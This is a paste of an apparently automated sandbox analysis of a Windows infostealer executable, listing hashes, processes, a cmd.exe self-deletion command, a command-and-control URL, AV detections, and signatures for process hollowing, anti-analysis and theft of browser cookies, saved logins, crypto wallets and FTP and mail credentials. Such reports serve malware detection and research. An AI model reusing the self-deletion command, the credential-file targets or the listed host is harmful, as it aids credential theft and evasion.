API tools faq
paste
Advertisement
paladin316

784Exes_3def155b4c3c49e69e2f76499de14034_exe_2019-09-03_08_30.txt

paladin316
Sep 3rd, 2019
1,807
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 38.72 KB | None | 0 0
raw download clone embed print report
  1.  
  2. * ID: 784
  3. * MalFamily: "Malicious"
  4.  
  5. * MalScore: 10.0
  6.  
  7. * File Name: "Exes_3def155b4c3c49e69e2f76499de14034.exe"
  8. * File Size: 540672
  9. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  10. * SHA256: "db6309a594ea596569a878d8a692b83abe35aa33b2c2b39aa81615005c0d30ac"
  11. * MD5: "3def155b4c3c49e69e2f76499de14034"
  12. * SHA1: "72a9f61dcdbf43e2cb40f5fe171008c2aa70cc63"
  13. * SHA512: "28c221ebe2899034a902584eed7fb08b4341011c1e5cced3dc771451a95032807d1a49aac2ff259f4f97eed26d58767736387ff1a6a3c91b4699561e965f4ed8"
  14. * CRC32: "2C4801B7"
  15. * SSDEEP: "6144:SsJcPyFZfh/EkIafaUEl8GEnwwcTRvpM9/5V2MYfG6jqoHTshzjJ3gFKxrNVt3gr:SMLZ/gNdl8CB0WMYfPO1TrXtB"
  16.  
  17. * Process Execution:
  18. "fo1GrAw0yY7y3v.exe",
  19. "fo1GrAw0yY7y3v.exe",
  20. "cmd.exe",
  21. "timeout.exe",
  22. "services.exe",
  23. "lsass.exe",
  24. "WmiApSrv.exe",
  25. "svchost.exe",
  26. "svchost.exe",
  27. "WMIADAP.exe",
  28. "WmiPrvSE.exe"
  29.  
  30.  
  31. * Executed Commands:
  32. "\"C:\\Users\\user\\AppData\\Local\\Temp\\fo1GrAw0yY7y3v.exe\"",
  33. "\"C:\\Windows\\system32\\cmd.exe\" /c C:\\Windows\\system32\\timeout.exe 3 & del \"fo1GrAw0yY7y3v.exe\"",
  34. "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"fo1GrAw0yY7y3v.exe\"",
  35. "C:\\Windows\\system32\\lsass.exe",
  36. "C:\\Windows\\system32\\wbem\\WmiApSrv.exe",
  37. "C:\\Windows\\system32\\svchost.exe -k netsvcs",
  38. "C:\\Windows\\system32\\timeout.exe 3"
  39.  
  40.  
  41. * Signatures Detected:
  42.  
  43. "Description": "Behavioural detection: Executable code extraction",
  44. "Details":
  45.  
  46.  
  47. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
  48. "Details":
  49.  
  50.  
  51. "Description": "Possible date expiration check, exits too soon after checking local time",
  52. "Details":
  53.  
  54. "process": "fo1GrAw0yY7y3v.exe, PID 2200"
  55.  
  56.  
  57.  
  58.  
  59. "Description": "Anomalous file deletion behavior detected (10+)",
  60. "Details":
  61.  
  62. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\77286712228860818777495.tmp"
  63.  
  64.  
  65. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\77606567442813517908471.tmp"
  66.  
  67.  
  68. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\77807507176124744018490.tmp"
  69.  
  70.  
  71. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\77807961859402425274913.tmp"
  72.  
  73.  
  74. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\77808751418418532293274.tmp"
  75.  
  76.  
  77. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat"
  78.  
  79.  
  80. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat"
  81.  
  82.  
  83. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll"
  84.  
  85.  
  86. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll"
  87.  
  88.  
  89. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll"
  90.  
  91.  
  92. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll"
  93.  
  94.  
  95. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll"
  96.  
  97.  
  98. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll"
  99.  
  100.  
  101. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll"
  102.  
  103.  
  104. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll"
  105.  
  106.  
  107. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll"
  108.  
  109.  
  110. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll"
  111.  
  112.  
  113. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll"
  114.  
  115.  
  116. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll"
  117.  
  118.  
  119. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll"
  120.  
  121.  
  122. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll"
  123.  
  124.  
  125. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll"
  126.  
  127.  
  128. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll"
  129.  
  130.  
  131. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll"
  132.  
  133.  
  134. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll"
  135.  
  136.  
  137. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll"
  138.  
  139.  
  140. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll"
  141.  
  142.  
  143. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll"
  144.  
  145.  
  146. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll"
  147.  
  148.  
  149. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll"
  150.  
  151.  
  152. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll"
  153.  
  154.  
  155. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll"
  156.  
  157.  
  158. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll"
  159.  
  160.  
  161. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll"
  162.  
  163.  
  164. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll"
  165.  
  166.  
  167. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll"
  168.  
  169.  
  170. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll"
  171.  
  172.  
  173. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll"
  174.  
  175.  
  176. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll"
  177.  
  178.  
  179. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll"
  180.  
  181.  
  182. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll"
  183.  
  184.  
  185. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll"
  186.  
  187.  
  188. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll"
  189.  
  190.  
  191. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll"
  192.  
  193.  
  194. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll"
  195.  
  196.  
  197. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll"
  198.  
  199.  
  200. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll"
  201.  
  202.  
  203. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll"
  204.  
  205.  
  206. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll"
  207.  
  208.  
  209. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll"
  210.  
  211.  
  212. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll"
  213.  
  214.  
  215. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll"
  216.  
  217.  
  218. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll"
  219.  
  220.  
  221. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll"
  222.  
  223.  
  224. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll"
  225.  
  226.  
  227. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\fo1GrAw0yY7y3v.exe"
  228.  
  229.  
  230.  
  231.  
  232. "Description": "Guard pages use detected - possible anti-debugging.",
  233. "Details":
  234.  
  235.  
  236. "Description": "Performs HTTP requests potentially not found in PCAP.",
  237. "Details":
  238.  
  239. "url_ioc": "absetup8.icu:80//index.php"
  240.  
  241.  
  242. "url_ioc": "absetup8.icu:80//index.php"
  243.  
  244.  
  245.  
  246.  
  247. "Description": "A process created a hidden window",
  248. "Details":
  249.  
  250. "Process": "fo1GrAw0yY7y3v.exe -> C:\\Windows\\System32\\cmd.exe"
  251.  
  252.  
  253.  
  254.  
  255. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  256. "Details":
  257.  
  258. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  259.  
  260.  
  261. "suspicious_request_iocs": "http://absetup8.icu/index.php"
  262.  
  263.  
  264.  
  265.  
  266. "Description": "Performs some HTTP requests",
  267. "Details":
  268.  
  269. "url_iocs": "http://absetup8.icu/index.php"
  270.  
  271.  
  272.  
  273.  
  274. "Description": "Uses Windows utilities for basic functionality",
  275. "Details":
  276.  
  277. "command": "\"C:\\Windows\\system32\\cmd.exe\" /c C:\\Windows\\system32\\timeout.exe 3 & del \"fo1GrAw0yY7y3v.exe\""
  278.  
  279.  
  280. "command": "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"fo1GrAw0yY7y3v.exe\""
  281.  
  282.  
  283.  
  284.  
  285. "Description": "Behavioural detection: Injection (Process Hollowing)",
  286. "Details":
  287.  
  288. "Injection": "fo1GrAw0yY7y3v.exe(2200) -> fo1GrAw0yY7y3v.exe(788)"
  289.  
  290.  
  291.  
  292.  
  293. "Description": "Executed a process and injected code into it, probably while unpacking",
  294. "Details":
  295.  
  296. "Injection": "fo1GrAw0yY7y3v.exe(2200) -> fo1GrAw0yY7y3v.exe(788)"
  297.  
  298.  
  299.  
  300.  
  301. "Description": "Deletes its original binary from disk",
  302. "Details":
  303.  
  304.  
  305. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  306. "Details":
  307.  
  308. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 1896668 times"
  309.  
  310.  
  311.  
  312.  
  313. "Description": "Steals private information from local Internet browsers",
  314. "Details":
  315.  
  316. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@doubleclick1.txt"
  317.  
  318.  
  319. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@advertising1.txt"
  320.  
  321.  
  322. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.bing2.txt"
  323.  
  324.  
  325. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@media2.txt"
  326.  
  327.  
  328. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.google1.txt"
  329.  
  330.  
  331. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google5.txt"
  332.  
  333.  
  334. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google4.txt"
  335.  
  336.  
  337. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google3.txt"
  338.  
  339.  
  340. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google1.txt"
  341.  
  342.  
  343. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.msn2.txt"
  344.  
  345.  
  346. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  347.  
  348.  
  349. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@msn1.txt"
  350.  
  351.  
  352. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.msn2.txt"
  353.  
  354.  
  355. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  356.  
  357.  
  358. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@3lift1.txt"
  359.  
  360.  
  361. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
  362.  
  363.  
  364. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@bing2.txt"
  365.  
  366.  
  367. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@scorecardresearch2.txt"
  368.  
  369.  
  370. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  371.  
  372.  
  373. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@atwola2.txt"
  374.  
  375.  
  376.  
  377.  
  378. "Description": "Collects information about installed applications",
  379. "Details":
  380.  
  381. "Program": "Google Update Helper"
  382.  
  383.  
  384.  
  385.  
  386. "Program": "Microsoft Excel MUI 2013"
  387.  
  388.  
  389. "Program": "Microsoft Outlook MUI 2013"
  390.  
  391.  
  392.  
  393.  
  394. "Program": "Google Chrome"
  395.  
  396.  
  397. "Program": "Adobe Flash Player 29 NPAPI"
  398.  
  399.  
  400. "Program": "Adobe Flash Player 29 ActiveX"
  401.  
  402.  
  403. "Program": "Microsoft DCF MUI 2013"
  404.  
  405.  
  406. "Program": "Microsoft Access MUI 2013"
  407.  
  408.  
  409. "Program": "Microsoft Office Proofing Tools 2013 - English"
  410.  
  411.  
  412. "Program": "Adobe Acrobat Reader DC"
  413.  
  414.  
  415. "Program": "Microsoft Publisher MUI 2013"
  416.  
  417.  
  418. "Program": "Microsoft Office Shared MUI 2013"
  419.  
  420.  
  421. "Program": "Microsoft Office OSM MUI 2013"
  422.  
  423.  
  424. "Program": "Microsoft InfoPath MUI 2013"
  425.  
  426.  
  427. "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
  428.  
  429.  
  430. "Program": "Outils de v\\xc3\\xa9rification linguistique 2013 de Microsoft Office\\xc2\\xa0- Fran\\xc3\\xa7ais"
  431.  
  432.  
  433. "Program": "Microsoft Word MUI 2013"
  434.  
  435.  
  436. "Program": "Microsoft OneDrive"
  437.  
  438.  
  439. "Program": "Microsoft Groove MUI 2013"
  440.  
  441.  
  442. "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xc3\\xb1ol"
  443.  
  444.  
  445.  
  446.  
  447. "Program": "Microsoft Access Setup Metadata MUI 2013"
  448.  
  449.  
  450. "Program": "Microsoft Office OSM UX MUI 2013"
  451.  
  452.  
  453. "Program": "Java Auto Updater"
  454.  
  455.  
  456. "Program": "Microsoft PowerPoint MUI 2013"
  457.  
  458.  
  459. "Program": "Microsoft Office Professional Plus 2013"
  460.  
  461.  
  462. "Program": "Adobe Refresh Manager"
  463.  
  464.  
  465. "Program": "Microsoft Office Proofing 2013"
  466.  
  467.  
  468. "Program": "Microsoft Lync MUI 2013"
  469.  
  470.  
  471.  
  472.  
  473. "Program": "Microsoft OneNote MUI 2013"
  474.  
  475.  
  476.  
  477.  
  478. "Description": "Stack pivoting was detected when using a critical API",
  479. "Details":
  480.  
  481. "process": "svchost.exe:700"
  482.  
  483.  
  484.  
  485.  
  486. "Description": "File has been identified by 17 Antiviruses on VirusTotal as malicious",
  487. "Details":
  488.  
  489. "FireEye": "Generic.mg.3def155b4c3c49e6"
  490.  
  491.  
  492. "McAfee": "Packed-FVG!3DEF155B4C3C"
  493.  
  494.  
  495. "CrowdStrike": "win/malicious_confidence_90% (W)"
  496.  
  497.  
  498. "Invincea": "heuristic"
  499.  
  500.  
  501. "Cyren": "W32/VBKrypt.SQ.gen!Eldorado"
  502.  
  503.  
  504. "APEX": "Malicious"
  505.  
  506.  
  507. "Kaspersky": "UDS:DangerousObject.Multi.Generic"
  508.  
  509.  
  510. "McAfee-GW-Edition": "BehavesLike.Win32.Fareit.hh"
  511.  
  512.  
  513. "Trapmine": "suspicious.low.ml.score"
  514.  
  515.  
  516. "SentinelOne": "DFI - Suspicious PE"
  517.  
  518.  
  519. "Endgame": "malicious (high confidence)"
  520.  
  521.  
  522. "Microsoft": "Trojan:Win32/Wacatac.B!ml"
  523.  
  524.  
  525. "ZoneAlarm": "UDS:DangerousObject.Multi.Generic"
  526.  
  527.  
  528. "Acronis": "suspicious"
  529.  
  530.  
  531. "Cylance": "Unsafe"
  532.  
  533.  
  534. "Cybereason": "malicious.dcdbf4"
  535.  
  536.  
  537. "Qihoo-360": "HEUR/QVM03.0.A059.Malware.Gen"
  538.  
  539.  
  540.  
  541.  
  542. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  543. "Details":
  544.  
  545.  
  546. "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  547. "Details":
  548.  
  549. "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallets\\wallet.dat"
  550.  
  551.  
  552. "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallets\\wallet.dat"
  553.  
  554.  
  555. "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallet.dat"
  556.  
  557.  
  558. "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallets\\wallet.dat"
  559.  
  560.  
  561. "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallet.dat"
  562.  
  563.  
  564. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallets\\wallet.dat"
  565.  
  566.  
  567. "file": "C:\\Users\\user\\AppData\\Roaming\\wallets\\wallet.dat"
  568.  
  569.  
  570. "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallets\\wallet.dat"
  571.  
  572.  
  573. "file": "C:\\Users\\user\\AppData\\wallets\\wallet.dat"
  574.  
  575.  
  576. "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallet.dat"
  577.  
  578.  
  579. "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallets\\wallet.dat"
  580.  
  581.  
  582. "file": "C:\\Users\\user\\AppData\\wallet.dat"
  583.  
  584.  
  585. "file": "C:\\Users\\user\\AppData\\Roaming\\wallet.dat"
  586.  
  587.  
  588. "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallet.dat"
  589.  
  590.  
  591. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallet.dat"
  592.  
  593.  
  594. "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallet.dat"
  595.  
  596.  
  597. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\*"
  598.  
  599.  
  600.  
  601.  
  602. "Description": "Harvests credentials from local FTP client softwares",
  603. "Details":
  604.  
  605. "file": "C:\\Users\\user\\AppData\\Roaming\\filezilla\\recentservers.xml"
  606.  
  607.  
  608.  
  609.  
  610. "Description": "Harvests information related to installed instant messenger clients",
  611. "Details":
  612.  
  613. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  614.  
  615.  
  616.  
  617.  
  618. "Description": "Harvests information related to installed mail clients",
  619. "Details":
  620.  
  621. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
  622.  
  623.  
  624. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
  625.  
  626.  
  627. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
  628.  
  629.  
  630. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
  631.  
  632.  
  633. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
  634.  
  635.  
  636. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
  637.  
  638.  
  639. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
  640.  
  641.  
  642. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
  643.  
  644.  
  645. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  646.  
  647.  
  648. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
  649.  
  650.  
  651. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
  652.  
  653.  
  654. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
  655.  
  656.  
  657. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
  658.  
  659.  
  660. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
  661.  
  662.  
  663. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
  664.  
  665.  
  666. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
  667.  
  668.  
  669. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
  670.  
  671.  
  672. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
  673.  
  674.  
  675. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
  676.  
  677.  
  678. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
  679.  
  680.  
  681. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
  682.  
  683.  
  684.  
  685.  
  686. "Description": "Collects information to fingerprint the system",
  687. "Details":
  688.  
  689.  
  690. "Description": "Uses suspicious command line tools or Windows utilities",
  691. "Details":
  692.  
  693. "command": "\"C:\\Windows\\system32\\cmd.exe\" /c C:\\Windows\\system32\\timeout.exe 3 & del \"fo1GrAw0yY7y3v.exe\""
  694.  
  695.  
  696. "command": "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"fo1GrAw0yY7y3v.exe\""
  697.  
  698.  
  699.  
  700.  
  701.  
  702. * Started Service:
  703. "VaultSvc",
  704. "wmiApSrv"
  705.  
  706.  
  707. * Mutexes:
  708. "A81FB8C60-BBE6E186-FC9B5DB5-36DA4559-33946726",
  709. "Global\\RefreshRA_Mutex_Lib",
  710. "Global\\RefreshRA_Mutex",
  711. "Global\\RefreshRA_Mutex_Flag",
  712. "Global\\WmiApSrv",
  713. "Global\\ADAP_WMI_ENTRY"
  714.  
  715.  
  716. * Modified Files:
  717. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
  718. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
  719. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
  720. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
  721. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
  722. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
  723. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
  724. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
  725. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
  726. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
  727. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
  728. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
  729. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
  730. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
  731. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
  732. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
  733. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
  734. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
  735. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
  736. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
  737. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
  738. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
